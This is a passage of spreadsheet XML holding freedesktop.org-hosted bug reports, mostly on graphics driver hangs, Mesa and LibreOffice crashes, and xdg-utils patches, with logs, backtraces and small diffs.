    <t>Version: xserver-xorg-video-intel 2:2.9.99.901+git20091208.47416b1e-0ubuntu0tormod~karmic (Ubuntu xorg-edgers package)
During normal Firefox usage the screen either goes black and the console freezes or an image remains and the mouse cursor is movable but nothing else responds. (I can't be very precise about the failure modes because they are being described to me remotely by a computer-phobic user.)
Anyway here is what I see in the X server log file:
----Xorg.0.log----
(II) intel(0): Modeline 640x480x59.9   25.18  640 656 752 800  480 490 492 525 -hsync -vsync (31.5 kHz)
(II) intel(0): Modeline 720x400x70.1   28.32  720 738 846 900  400 412 414 449 -hsync +vsync (31.5 kHz)
(WW) intel(0): i830_uxa_prepare_access: gtt bo map failed: Input/output error
(repeated 9 times)
(EE) intel(0): Failed to submit batch buffer expect rendering corruption or even a frozen display: Input/output error.
(repeated 5385 times)
(WW) intel(0): i830_uxa_prepare_access: gtt bo map failed: Input/output error
(repeated 79 times)
(EE) intel(0): Failed to submit batch buffer expect rendering corruption or even a frozen display: Input/output error.
----end----
Restarting the server (with Alt-SysRq-K) appears to lead to another black screen / movable mouse cursor / dead console hang with the new server log peppered with Failed to submit batch buffer messages.
There's no core dumps for these and grabbing a batchbuffer dump at one point actually horked the system completely (presumably a kernel panic as SSH no longer responded) so I'm not sure what additional information I could provide that would help track this bug down.</t>
  </si>
  <si>
    <t>skunk</t>
  </si>
  <si>
    <t>DRI-100926</t>
  </si>
  <si>
    <t>[ELK] HP Compaq 8000 E7500 displayport doesn't activate</t>
  </si>
  <si>
    <t>Created attachment 131199
eagle lake dp dmesg
HP Compaq 8000 E7500 displayport shows timeout errors in log and doesn't come up at all. Monitor is IBM ThinkVision connected with straight cable. VGA works.
Default Ubuntu kernel and DRM-Tip show same symptoms: monitor shortly coming out of power save then going back and no picture.
BIOS screen shows up through DP well enough.
DRM-Tip dmesg with drm.debug=0xe attached.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-14596</t>
  </si>
  <si>
    <t>svn or git update request from CVS</t>
  </si>
  <si>
    <t>In Web CVS recently notice a message Please note many of these repositories are now out of date instead you really should try the git repositories at: http://cgit.freedesktop.org/
So requesting to update to SVN or GIT from CVS repository (If required :).
http://webcvs.freedesktop.org/ldtp/ldtp/
Thanks
Nagappan</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-11327</t>
  </si>
  <si>
    <t>Request for GPG key modification</t>
  </si>
  <si>
    <t>Hi i have lost both my gpg key and ssk keys. So please add the following gpg key as the the new one to my account.</t>
  </si>
  <si>
    <t>sp2hari</t>
  </si>
  <si>
    <t>DRI-97875</t>
  </si>
  <si>
    <t>LCD flickering on Acer Aspire V3-772G with kernel 4.7.3 (PSR enabled)</t>
  </si>
  <si>
    <t>Created attachment 126666
full dmesg output with the following extra options: i915.enable_psr=0x2 log_buf_len=10M drm.debug=0x1e
Hi
Since the update from Fedora 22 to 24 and the associated upgrade of the kernel to 4.6/4.7
the screen of my Acer Aspire V3-772G (Intel i7-4702MQ GTX760M) has started to flicker.
The flickering starts immediately when the user login screen appears.
The flickering does happen occasionally when moving the mouse or when having something visible on the screen that moves (e.g. a watch command that has its output changed regularly or a youtube movie..).
The flickering does not occur when passing i915.enable_psr=0 to the kernel.
System: Acer Aspire V3-772G: i7-4702MQ GTX760M (Optimus) no external display.
$ uname -m
x86_64
$ uname -r
4.7.3-200.fc24.x86_64
$ cat /etc/system-release
Fedora release 24 (Twenty Four)
# lspci -s 00:02.0 -v
00:02.0 VGA compatible controller: Intel Corporation 4th Gen Core Processor Integrated Graphics Controller (rev 06) (prog-if 00 [VGA controller])
	Subsystem: Acer Incorporated [ALI] Device 0781
	Flags: bus master fast devsel latency 0 IRQ 31
	Memory at d3000000 (64-bit non-prefetchable) [size=4M]
	Memory at c0000000 (64-bit prefetchable) [size=256M]
	I/O ports at 5000 [size=64]
	[virtual] Expansion ROM at 000c0000 [disabled] [size=128K]
	Capabilities: [90] MSI: Enable+ Count=1/1 Maskable- 64bit-
	Capabilities: [d0] Power Management version 2
	Capabilities: [a4] PCI Advanced Features
	Kernel driver in use: i915
	Kernel modules: i915
Attached is a full dmesg output with the following extra options:
i915.enable_psr=0x2 log_buf_len=10M drm.debug=0x1e</t>
  </si>
  <si>
    <t>madebr</t>
  </si>
  <si>
    <t>LIBREOFFICE-42140</t>
  </si>
  <si>
    <t>LOCALHELP [ES] shows workflow comment</t>
  </si>
  <si>
    <t>(this bug has initially been reported in launchpad for ubuntu https://bugs.launchpad.net/ubuntu/+source/libreoffice-l10n/+bug/824737)
go to help in writer choose Ã­dice (index) write cartas en serie The article's tittle is:
Crear un formularioUFI: replace with guide for new MailMerge Wizard when that is visible
ProblemType: Bug
DistroRelease: Ubuntu 11.04
Package: libreoffice-core 1:3.3.2-1ubuntu5
ProcVersionSignature: Ubuntu 2.6.38-10.46-generic 2.6.38.7
Uname: Linux 2.6.38-10-generic x86_64
Architecture: amd64
Date: Thu Aug 11 16:00:53 2011
InstallationMedia: Ubuntu 11.04 Natty Narwhal - Release amd64 (20110427.1)
ProcEnviron:
 LANGUAGE=es_AR:en
 LANG=es_AR.UTF-8
 SHELL=/bin/bash
SourcePackage: libreoffice
UpgradeStatus: Upgraded to natty on 2011-06-23 (49 days ago)</t>
  </si>
  <si>
    <t>mabeett</t>
  </si>
  <si>
    <t>WOCKY-34975</t>
  </si>
  <si>
    <t>porter should have a fallback for no IQ handlers</t>
  </si>
  <si>
    <t>Gabble has this:
&gt;  /* FIXME: the porter should do this for us. */
&gt;  wocky_porter_register_handler_from_anyone (priv-&gt;porter
&gt;      WOCKY_STANZA_TYPE_IQ WOCKY_STANZA_SUB_TYPE_NONE
&gt;      WOCKY_PORTER_HANDLER_PRIORITY_MIN
&gt;      iq_unknown_cb conn NULL)
iq_unknown_cb does this:
&gt;  wocky_stanza_get_type_info (stanza NULL 
&gt;
&gt;  switch (subtype)
&gt;    {
&gt;    case WOCKY_STANZA_SUB_TYPE_GET:
&gt;    case WOCKY_STANZA_SUB_TYPE_SET:
&gt;      _gabble_connection_send_iq_error (conn stanza
&gt;           XMPP_ERROR_SERVICE_UNAVAILABLE NULL)
&gt;       return TRUE
&gt;     default:
&gt;       break
&gt;     }
&gt; 
&gt;   return FALSE
The porter should do this for us instead of just not replying to IQs.</t>
  </si>
  <si>
    <t>XORG-13034</t>
  </si>
  <si>
    <t>add 1920x1080 mode to intel tv out</t>
  </si>
  <si>
    <t>Any reason not to include this patch against the intel driver?  It allows
me to do fullscreen TV when the DVI output is connected to a 1080p
projector at the same time.  I see the 720p mode is already there.
diff --git a/src/i830_tv.c b/src/i830_tv.c
index ee2538a..e7b3f92 100644
--- a/src/i830_tv.c
+++ b/src/i830_tv.c
@@ -13986 +13987 @@ static struct input_res {
        {1280x1024 1280 1024}
        {848x480 848 480}
        {1280x720 1280 720}
+       {1920x1080 1920 1080}
 }
 /**</t>
  </si>
  <si>
    <t>rglowery</t>
  </si>
  <si>
    <t>LIBREOFFICE-80986</t>
  </si>
  <si>
    <t>Saving DOCX as ODT/DOC loses text highlight</t>
  </si>
  <si>
    <t>Created attachment 102342
test docx file with text highlighted
The attached DOCX file contains text with highlight. When save as ODT highlight is lost.
Steps to reproduce:
1. Save the test docx as ODT.
Current Behaviour:
Yellow highlight is lost.
OS: Win XP SP3
LibreOffice 4.3.0.2.</t>
  </si>
  <si>
    <t>XORG-24512</t>
  </si>
  <si>
    <t>Massive random corruptions on screen with KMS 2.6.32-rc3-git3</t>
  </si>
  <si>
    <t>I get massive corruptions on the screen with the latest GIT. This was not a problem a week ago (or so).
I am currently (ab)using 2.6.32-rc3-git3 KMS dualhead (VGA/HDMI) X.Org X Server 1.7.0 x11-libs/libdrm-9999 x11-drivers/xf86-video-ati-9999 media-libs/mesa-9999 (those build the git).
I will attach the screenshots.</t>
  </si>
  <si>
    <t>LIBCANBERRA-32327</t>
  </si>
  <si>
    <t>Drop GConf when compiled against GTK+ 3</t>
  </si>
  <si>
    <t>GConf is declared obsolete in GTK+/GNOME 3 enviroment.
Moreover it should be used in libcanberra to interact with gnome-setting-daemon and g-s-d no longer uses GConf.</t>
  </si>
  <si>
    <t>MESA-58666</t>
  </si>
  <si>
    <t>rv670 + llvm = errors.</t>
  </si>
  <si>
    <t>I've only just tested this AGP HD3850 card with tstellar LLVM (or any llvm) as it's been out of the PC since Feb.
Both last week and now with updated llvm/mesa gits running anything eg. gears will just flood -
EE r600_asm.c:122 r600_bytecode_get_num_operands - Need instruction operand number for 0xc.
Works OK with R600_LLVM=0
This was tested with drm-fixes kernel.</t>
  </si>
  <si>
    <t>DRI-37533</t>
  </si>
  <si>
    <t>[bisected pineview] Kernel boot fail with black screen on -next</t>
  </si>
  <si>
    <t xml:space="preserve">System Environment:
--------------------------
Arch:           i386
Platform:     pineview  
Libdrm: (master)2.4.25-1-g61be94018ae9c403517d53f69357719224fa6ff3
Mesa:   (master)d0c6d24a9ebe31b3a805e8f5845fc7e6fa552a98
Xserver:(master)xorg-server-1.10.0-384-g1fb501ad1521cfedaa5cf3052d45a924ef1866cf
Xf86_video_intel: (master)2.15.0-17-g9d6e02a135efdea1d169d1938359ab2b553e941c
Kernel:(drm-intel-next)9e3c256d7d56a12a3242222945ce8e6347f93fa0
Bug detailed description:
-------------------------
When changing kernel from crhis to Keith we find kernel boot failed on pineview with black sreen.  Bisect shows commit 6067aaeadb5b3df26f27ac827256b1ef01e674f5 is the first bad commit.
6067aaeadb5b3df26f27ac827256b1ef01e674f5
Author:     Jesse Barnes 
AuthorDate: Thu Apr 28 15:04:31 2011 -0700
Commit:     Keith Packard 
CommitDate: Fri May 13 18:12:50 2011 -0700
    drm/i915: split clock gating init into per-chipset functions
    This helps contain the mess to init_display() instead.
    Signed-off-by: Jesse Barnes 
    Reviewed-by: Keith Packard 
    Signed-off-by: Keith Packard </t>
  </si>
  <si>
    <t>PORTLAND-8156</t>
  </si>
  <si>
    <t>xdg-email generic support</t>
  </si>
  <si>
    <t>It would be nice if there was generic support in xdg-email (when there's no kde
gnome or xfce). In Debian I implemented this by calling the default browser
(basically $BROWSER and some Debian-specific stuff).
I'm not sure this is the right thing to do but to me it appears to be a
reasonable fallback.</t>
  </si>
  <si>
    <t>TELEPATHY-31102</t>
  </si>
  <si>
    <t>update to spec 0.21.3</t>
  </si>
  <si>
    <t>Release blocker: update to the latest spec. I have a branch.</t>
  </si>
  <si>
    <t>LIBREOFFICE-46707</t>
  </si>
  <si>
    <t>Crashes when right clicked to call context menu while a mixture of alphabets and Japanese texts are selected</t>
  </si>
  <si>
    <t>Created attachment 57741
Open the bugdoc and follow the steps. Calc crashes everytime
LibreOffice crashes when right clicked to call context menu while a mixture of
alphabets and Japanese texts are selected.
I will attach a sample bugdoc created on LO 3.5.0
How to reproduce:
1:Open Bugdoc.ods
2:Select cell A1 and press F2 key to go into that cell
3:Press Ctrl+A to select all the text
4:Right click to call context menu
5:Calc Crashes
As far as I can tell the alphabets must come at the beginning of the line.
And quite a number of Japanese text must also be selected at the same time.
But no complex formatting or functions are needed to reproduce as you can
see from the bugdoc.
Work aound:
* Do not select all of the texts... It seems that the number of texts being
  selected matters. Select one less letter at the end of the line in the 
  attached file then it works fine.
* Disable Hunspell SpellChecker
  To do this go to Tools - Options - Language Settings - Writing Aids -
  Uncheck Hunspell SpellChecker - Press OK and the problem seems to go away.
I have tested this on OO 3.2.1 with no problem but was able to reproduce it on
OO 3.3.0 and LO 3.3.0 - LO 3.5.0 on Windows 7 and XP.
It also happens on Impress as well but not with Writer.
I suspect that there is a collision on Hunspell Spellchecker caused by a function Synomyms within context menu for Calc and Impress that was introduced in OO 3.3.0 where as there is no such a function in Writer.(or at least not within context menu)
Anyway it is only an asumption after all. So please correct me if I'm wrong.
And let me know if more infomations are needed. I will do my best to meet what is required.
Regards</t>
  </si>
  <si>
    <t>ahiroshige</t>
  </si>
  <si>
    <t>MESA-110541</t>
  </si>
  <si>
    <t>malloc() error when compiling shader</t>
  </si>
  <si>
    <t>Created attachment 144105
Test program to reproduce the error.
While working on some OpenGL tutorials I found that on my computer with Intel graphics the fragment shader has problems - colours were coming out incorrect at first (works fine on my RX580).  When I tried to simplify the shader to narrow down the cause the program started crashing during compilation of the shader with the error:
   corrupted size vs. prev_size
   Aborted (core dumped)
I compiled a debug version of Mesa (19.0.3) and got the following stack trace of the crash:
[kmshanah@cable test2]$ gdb ./lighting
GNU gdb (GDB) 8.2.1
Copyright (C) 2018 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.
Type show copying and show warranty for details.
This GDB was configured as x86_64-pc-linux-gnu.
Type show configuration for configuration details.
For bug reporting instructions please see:
.
Find the GDB manual and other documentation resources online at:
    .
For help type help.
Type apropos word to search for commands related to word...
Reading symbols from ./lighting...done.
(gdb) run
Starting program: /home/kmshanah/projects/sdl/test2/lighting 
[Thread debugging using libthread_db enabled]
Using host libthread_db library /usr/lib/libthread_db.so.1.
[New Thread 0x7ffff4e81700 (LWP 12031)]
malloc(): invalid size (unsorted)
Thread 1 lighting received signal SIGABRT Aborted.
0x00007ffff75af82f in raise () from /usr/lib/libc.so.6
(gdb) bt
#0  0x00007ffff75af82f in raise () from /usr/lib/libc.so.6
#1  0x00007ffff759a672 in abort () from /usr/lib/libc.so.6
#2  0x00007ffff75f1e78 in __libc_message () from /usr/lib/libc.so.6
#3  0x00007ffff75f878a in malloc_printerr () from /usr/lib/libc.so.6
#4  0x00007ffff75fb4a4 in _int_malloc () from /usr/lib/libc.so.6
#5  0x00007ffff75fccda in malloc () from /usr/lib/libc.so.6
#6  0x00007ffff56907ce in ralloc_size (ctx=0x5555555bcbd0 size=size@entry=136) at ../mesa-19.0.3/src/util/ralloc.c:119
#7  0x00007ffff56908a9 in rzalloc_size (ctx= size=size@entry=136) at ../mesa-19.0.3/src/util/ralloc.c:151
#8  0x00007ffff59a0a9d in nir_intrinsic_instr_create (shader= op=nir_intrinsic_load_barycentric_pixel) at ../mesa-19.0.3/src/compiler/nir/nir.c:501
#9  0x00007ffff59ad3af in nir_load_barycentric (interp_mode=1 op= build=0x7fffffffc508) at ../mesa-19.0.3/src/compiler/nir/nir_builder.h:1092
#10 lower_load (intrin=intrin@entry=0x555555c415c0 state=state@entry=0x7fffffffc500 vertex_index=0x0 var=0x555555c22da0 offset=0x555555c22ea0 component=0)
    at ../mesa-19.0.3/src/compiler/nir/nir_lower_io.c:227
#11 0x00007ffff59b357d in lower_interpolate_at (component= offset= var= state= intrin=)
    at ../mesa-19.0.3/src/compiler/nir/nir_lower_io.c:479
#12 nir_lower_io_block (block=0x555555c32150 state=0x7fffffffc500) at ../mesa-19.0.3/src/compiler/nir/nir_lower_io.c:510
#13 nir_lower_io_impl (options=(unknown: 0) type_size=0x7ffff5b9fe00  modes=nir_var_shader_in impl=0x555555c279d0)
    at ../mesa-19.0.3/src/compiler/nir/nir_lower_io.c:554
#14 nir_lower_io (shader=shader@entry=0x5555555bcbd0 modes=modes@entry=nir_var_shader_in type_size=0x7ffff5b9fe00  options=(unknown: 0))
    at ../mesa-19.0.3/src/compiler/nir/nir_lower_io.c:573
#15 0x00007ffff5b36f10 in brw_nir_lower_fs_inputs (nir=nir@entry=0x5555555bcbd0 devinfo=devinfo@entry=0x55555561b718 key=key@entry=0x7fffffffdf00)
    at ../mesa-19.0.3/src/intel/compiler/brw_nir.c:455
#16 0x00007ffff5af2754 in brw_compile_fs (compiler=0x55555561d7b0 log_data=log_data@entry=0x5555558065b0 mem_ctx=mem_ctx@entry=0x555555c21fd0 key=key@entry=0x7fffffffdf00 
    prog_data=prog_data@entry=0x7fffffffdcb0 shader=shader@entry=0x5555555bcbd0 prog=0x555555c29d60 shader_time_index8=-1 shader_time_index16=-1 shader_time_index32=-1 
    allow_spilling=true use_rep_send=false vue_map=0x7fffffffdfb0 error_str=0x7fffffffdca8) at ../mesa-19.0.3/src/intel/compiler/brw_fs.cpp:7604
#17 0x00007ffff55f9778 in brw_codegen_wm_prog (brw=brw@entry=0x5555558065b0 fp=fp@entry=0x555555c29d60 key=key@entry=0x7fffffffdf00 vue_map=0x7fffffffdfb0)
    at ../mesa-19.0.3/src/mesa/drivers/dri/i965/brw_wm.c:184
#18 0x00007ffff55fb746 in brw_fs_precompile (ctx=ctx@entry=0x5555558065b0 prog=0x555555c29d60) at ../mesa-19.0.3/src/mesa/drivers/dri/i965/brw_wm.c:689
#19 0x00007ffff55e40db in brw_shader_precompile (sh_prog=0x555555847e60 ctx=0x5555558065b0) at ../mesa-19.0.3/src/mesa/drivers/dri/i965/brw_link.cpp:56
#20 brw_link_shader (ctx=0x5555558065b0 shProg=0x555555847e60) at ../mesa-19.0.3/src/mesa/drivers/dri/i965/brw_link.cpp:375
#21 0x00007ffff58297da in _mesa_glsl_link_shader (ctx=ctx@entry=0x5555558065b0 prog=prog@entry=0x555555847e60) at ../mesa-19.0.3/src/mesa/program/ir_to_mesa.cpp:3174
#22 0x00007ffff5723e3a in link_program (no_error= shProg= ctx=) at ../mesa-19.0.3/src/mesa/main/shaderapi.c:1206
#23 link_program_error (shProg=0x555555847e60 ctx=0x5555558065b0) at ../mesa-19.0.3/src/mesa/main/shaderapi.c:1286
#24 link_program_error (ctx=0x5555558065b0 shProg=0x555555847e60) at ../mesa-19.0.3/src/mesa/main/shaderapi.c:1284
#25 0x0000555555556884 in load_shader (vertexPath=0x555555575f2e lighting.vs fragmentPath=0x555555575f22 lighting.fs result=0x7fffffffe260) at shader.c:99
#26 0x0000555555572d16 in initGL () at lighting.c:222
#27 0x0000555555572cb2 in init () at lighting.c:208
#28 0x0000555555573f40 in main (argc=1 args=0x7fffffffe878) at lighting.c:544
glxinfo gives the following driver info:
    Vendor: Intel Open Source Technology Center (0x8086)
    Device: Mesa DRI Intel(R) HD Graphics 515 (Skylake GT2)  (0x191e)
    Version: 19.0.3
    Accelerated: yes
    Video memory: 3072MB
    Unified memory: yes
    Preferred profile: core (0x1)
    Max core profile version: 4.5
    Max compat profile version: 3.0
    Max GLES1 profile version: 1.1
    Max GLES[23] profile version: 3.2
I will attach my small test program.</t>
  </si>
  <si>
    <t>FARSTREAM-70606</t>
  </si>
  <si>
    <t>fs-rtp-codec-negotiation.c:640: bad if test ?</t>
  </si>
  <si>
    <t>Source code is
      if (ca-&gt;codec-&gt;id == FS_CODEC_ID_ANY &amp;&amp;
          (bp-&gt;codec-&gt;id &gt;= 0 || bp-&gt;codec-&gt;id &lt; 128))
gcc compiler with extra flag -Wlogical-op says
fs-rtp-codec-negotiation.c:640:11: warning: logical 'or' of collectively exhaustive tests is always true [-Wlogical-op]
Suggest swap || for &amp;&amp;</t>
  </si>
  <si>
    <t>MESA-41231</t>
  </si>
  <si>
    <t>GL_INVALID_ENUM when using glxinfo -l</t>
  </si>
  <si>
    <t>Hi
using git 455a19b1b3d7ca0a40c65d89e45209dbd8ac7b35 and running:
$ glxinfo -l &gt; /dev/null
makes mesa sad:
Mesa: User error: GL_INVALID_ENUM in glGetIntegerv(pname=GL_MAX_COLOR_MATRIX_STACK_DEPTH)
Mesa: User error: GL_INVALID_ENUM in glGetConvolutionParameteriv
This doesn't happen with stock mesa 7.11 nor when using LIBGL_ALWAYS_SOFTWARE=1. The driver is r600g the device is:
01:00.0 VGA compatible controller: ATI Technologies Inc Robson CE [AMD Radeon HD 6300 Series]
I'm using debian unstable FWIW.</t>
  </si>
  <si>
    <t>stefano.teso</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-49133</t>
  </si>
  <si>
    <t>Valid query without result only blank page shown</t>
  </si>
  <si>
    <t>I checked an old query linked from the LibreOffice Wiki on  Blue Menu Line â†’ Open Issues and it does not work.
I tried to create an own nonsense-query for Product LibO Status contains any of the strings RESOLVED VERIFIED CLOSED (see a.m. URL) but I only got an empty page no search results. Same bad result for contains none of the strings. 
This one might be related to Bug 41983 - Software error message instead of search results?</t>
  </si>
  <si>
    <t>PORTLAND-40041</t>
  </si>
  <si>
    <t>Thunderbird 5 needs unescaped addresses</t>
  </si>
  <si>
    <t>Created attachment 50158
proposed patch
Thunderbird 5 (and probably also TB 3) expects unescaped strings passed for To: Cc: and BCc: fields. With the current xdg-email version Thunderbird uses escaped strings as addresses. This is not true for Subject and Body fields where strings are properly unescaped by TB itself. Truly inconsistent behaviour.
The attached patch unescapes address fields back to plain text. I don't think this is the cleanest solution but it's not intrusive at least. Proper way could be to pass original strings directly (saving them aside when parsing commandline args) but the script architecture would need to be altered.
Current behaviour:
&gt; $ XDG_UTILS_DEBUG_LEVEL=99 ./xdg-email --to 'John Doe ' --cc 'Copy machine ' --bcc 'Big Brother ' --subject 'Hello world!' --body 'Hi this is the body.'
&gt; Running thunderbird -compose to='John%20Doe%20'cc='Copy%20machine%20'bcc='Big%20Brother%20'subject=Hello%20world%21body=Hi%2C%20this%20is%20the%20body.</t>
  </si>
  <si>
    <t>FARSTREAM-31873</t>
  </si>
  <si>
    <t>Build fix for farsight-0.0.22 on NetBSD</t>
  </si>
  <si>
    <t>Created attachment 40514
Patch fixing the problem.
When compiling farsight-0.0.22 on NetBSD-5.99.39/amd64 the build fails with:
  CC     libshm_transmitter_la-fs-shm-stream-transmitter.lo
In file included from fs-shm-transmitter.c:56:
/usr/include/netinet/ip.h:67: error: field 'ip_src' has incomplete type
/usr/include/netinet/ip.h:67: error: field 'ip_dst' has incomplete type
/usr/include/netinet/ip.h:149: error: expected specifier-qualifier-list before '
n_time'
/usr/include/netinet/ip.h:187: error: field 'ippseudo_src' has incomplete type
/usr/include/netinet/ip.h:188: error: field 'ippseudo_dst' has incomplete type
It seems more header files would be needed before including netinet/ip.h.
Luckily at least on NetBSD the header doesn't seem to be needed -- just removing the header inclusion works (see attached patch).
If that would break other platforms please wrap the #include in an #ifndef __NetBSD__. Thanks.</t>
  </si>
  <si>
    <t>DRI-22906</t>
  </si>
  <si>
    <t>Visibly lower color depth with driver from on KMS kernel</t>
  </si>
  <si>
    <t>Hi.
I'm running Xorg-server 1.6.2 mesa 7.5 xf86-video-intel-2.7.99.902 and kernel 2.6.30 and 2.6.31-rc3 on gentoo on Acer TravelMate 2490 with 940gml chipset and gma950 graphics.
KMS works great native resolution is recognized uxa works.
Problem: visibly lower color depth with driver on KMS kernel.
If I modify intel_lvds.c to:
   if (1 || dev_priv-&gt;panel_wants_dither || dev_priv-&gt;lvds_dither)
colors looks like they should without color gradients.
As per bug http://bugs.freedesktop.org/show_bug.cgi?id=20997 I don't have rom file for dump in /sys/devices/pci0000:00/0000:00:02.0.</t>
  </si>
  <si>
    <t>majhen.ivan</t>
  </si>
  <si>
    <t>PULSEAUDIO-83229</t>
  </si>
  <si>
    <t>Patch: Do not instantiate cardwidget devicewidget and rolewidget with a type of EventBox</t>
  </si>
  <si>
    <t>Created attachment 105412
[PATCH] Do not instantiate cardwidget devicewidget and rolewidget with a type of EventBox
RoleWidget::create contains:
    x-&gt;get_widget_derived(streamWidget w)
But streamWidget is defined as following in the glade file:
Where as RoleWidget is derived from [Minimal]StreamWidget which is derived
from Gtk::VBox so this is clearly wrong.
Adding:
printf(rolewidget type: %s\n g_type_name(G_TYPE_FROM_INSTANCE(w-&gt;gobj())))
for debugging shows that this really leads to RoleWidget being instantiated
as an EventBox (yet things still work due to sheer luck).
This commit fixes this by putting the streamWidget id at the right level of
the hierarchy in the glade file (and likewise for cardWidget and deviceWidget).</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-19019</t>
  </si>
  <si>
    <t>Project creation request for ModemManager</t>
  </si>
  <si>
    <t>Creation request for ModemManager which is a system daemon for controlling mobile broadband devices like data cards and cell phones.  Ideally using subdirs like PackageKit leading to ModemManager/ModemManager.git as the main modem manager repo.  Access should be granted to me (dcbw) and Tambet Ingo (tambet).  Thanks!</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-41555</t>
  </si>
  <si>
    <t>Make PBM/PPM detection more permissive</t>
  </si>
  <si>
    <t>The # comment character is optionnal.
See also https://bugs.freedesktop.org/show_bug.cgi?id=2359</t>
  </si>
  <si>
    <t>CAIRO-4198</t>
  </si>
  <si>
    <t>ref_count fields can go negative</t>
  </si>
  <si>
    <t>The various ref_count fields will go negative if destroy is called with
ref_count == 0. We noticed this in cairo_surface.c but it looks like a
more general bug pattern.
Since we first noticed this bug we added special handling for
ref_count == -1 for nil objects. So we just need a simple extension
of that handling to cover this case as we..</t>
  </si>
  <si>
    <t>TELEPATHY-49802</t>
  </si>
  <si>
    <t>vala: Fix srcdir != builddir</t>
  </si>
  <si>
    <t>We need to look for the .metadata file in the source directory
otherwise we silently generate a binding with a namespace of Tp not
TelepathyGLib.</t>
  </si>
  <si>
    <t>PORTLAND-33699</t>
  </si>
  <si>
    <t>xdg-open's list of fallback browsers excludes seamonkey</t>
  </si>
  <si>
    <t>Created attachment 42701
add seamonkey to the list of browsers to try
The list of fallback browsers in xdg-open/xdg-email includes ``mozilla'' but excludes ``seamonkey''. Seamonkey is the continuation of the mozilla suite and should thus should be preferred over the mozilla suite.
See attached patch.</t>
  </si>
  <si>
    <t>ohnobinki</t>
  </si>
  <si>
    <t>MESA-91187</t>
  </si>
  <si>
    <t>F.E.A.R 2 (in Wine) runs out of memory and crashes</t>
  </si>
  <si>
    <t>With mesa/nouveau the game crashes when I start a new game or load a previously saved game. Text on the loading screen becomes corrupted (blocky) and the game crashes a few seconds later.
Looks like it happens when the graphical option  is enabled and set to maximum. If I reduce every other graphical options to the minimum but leave Texture LOD on maximum then the game crashes.
With Nvidia blob 340.76 the game runs stable for a long period of time even if I set everything to the maximum including anti-aliasing..
The crash occurs with the software renderer too.
Wine terminal output+backtrace:
http://pastebin.com/0AhVxDMj
Trace (uncompressed 450 MB):
https://drive.google.com/open?id=0B-tTbLKBl-tOVExQSEFERjZLeUE
Fedora 22 32-bit
VGA compatible controller: NVIDIA Corporation G92 [GeForce GTS 250] (rev a2) (prog-if 00 [VGA controller])
Mesa from git
Kernel 4.0.6-300.fc22.i686+PAE
Xorg 1.17.2
libdrm-2.4.61-3.fc22.i686</t>
  </si>
  <si>
    <t>TELEPATHY-23351</t>
  </si>
  <si>
    <t>telepathy-idle-0.1.4: strnlen not portable enough</t>
  </si>
  <si>
    <t>Created attachment 28673
Workaround
While strnlen is now in POSIX 2008 it is not yet available on all systems.
NetBSD-current only recently added it in May so the last release doesn't have it.
Since it is only used in one file a possible workaround is attached.</t>
  </si>
  <si>
    <t>DRI-109981</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@i915_selftest@mock_requests - dmesg-warn - BUG: unable to handle kernel NULL pointer dereference at 0000000000000000</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/IGT_4881/shard-iclb8/igt@i915_selftest@mock_requests.html
 [65.039091] i915: Running i915_request_mock_selftests/mock_breadcrumbs_smoketest
 [65.862647] waiting for 395 fences (last 1069:2) on mock timed out!
 [65.862738] BUG: unable to handle kernel NULL pointer dereference at 0000000000000000
 [65.862745] #PF error: [INSTR]
 [65.862748] PGD 0 P4D 0 
 [65.862752] Oops: 0010 [#1] PREEMPT SMP NOPTI
 [65.862758] CPU: 2 PID: 1138 Comm: igt/2 Tainted: G     U            5.0.0-CI-CI_DRM_5734+ #1
 [65.862765] Hardware name: Intel Corporation Ice Lake Client Platform/IceLake U DDR4 SODIMM PD RVP TLC BIOS ICLSFWR1.R00.3087.A00.1902250334 02/25/2019
 [65.862774] RIP: 0010:          (null)
 [65.862780] Code: Bad RIP value.
 [65.862783] RSP: 0018:ffffc90000577de0 EFLAGS: 00010246
 [65.862788] RAX: 0000000000000000 RBX: ffff8884900c8058 RCX: 0000000000000000
 [65.862794] RDX: 0000000000000001 RSI: 00000000000001ff RDI: ffff888499c1c000
 [65.862800] RBP: ffff888499c1c000 R08: 0000000000000f0a R09: ffff88849d289000
 [65.862805] R10: ffff88849d289d68 R11: ffff88849e1bcfb8 R12: ffff8884900c8058
 [65.862811] R13: ffff8884900c0918 R14: ffff8884900c8058 R15: ffff8884900c8098
 [65.862816] FS:  0000000000000000(0000) GS:ffff88849fe80000(0000) knlGS:0000000000000000
 [65.862823] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 [65.862828] CR2: ffffffffffffffd6 CR3: 0000000495914001 CR4: 0000000000760ee0
 [65.862834] PKRU: 55555554
 [65.862836] Call Trace:
 [65.862887]  ? __i915_gem_set_wedged.part.5+0x7a/0x1f0 [i915]
 [65.862895]  ? printk+0x4d/0x69
 [65.862928]  ? i915_gem_set_wedged+0x2a/0x40 [i915]
 [65.862972]  ? __igt_breadcrumbs_smoketest+0x514/0x6f0 [i915]
 [65.862980]  ? wait_woken+0xa0/0xa0
 [65.863022]  ? i915_request_add+0x9d0/0x9d0 [i915]
 [65.863027]  ? kthread+0x119/0x130
 [65.863031]  ? kthread_park+0x80/0x80
 [65.863037]  ? ret_from_fork+0x24/0x50</t>
  </si>
  <si>
    <t>LIBREOFFICE-79422</t>
  </si>
  <si>
    <t>EDITING: Calc sluggish after find and replace due to large selection of replaced cells</t>
  </si>
  <si>
    <t>Created attachment 100118
Sample data (ODS file)
This bug is related to Bug 77515.
Workflow to reproduce:
1. open attached file
2. replace 'NA' with '' in whole file
3. wait some time displayed cells with NA content are changed then Calc seems to hang in endless loop.
4. after 4-5 minutes still no result...
br Walter
PS: Calc doesn't seem to be Muellner-proof -)</t>
  </si>
  <si>
    <t>LIBREOFFICE-38411</t>
  </si>
  <si>
    <t>FILEOPEN FORMATTING images displayed wrong in DOC</t>
  </si>
  <si>
    <t>Created attachment 48104
sample DOC with images
The attached DOC contains small cards with pictures. In LibreOffice some of the pictures are totally messed up. Instead of one card - one picture some cards contain many pictures in miniaturised form. See the attachment.</t>
  </si>
  <si>
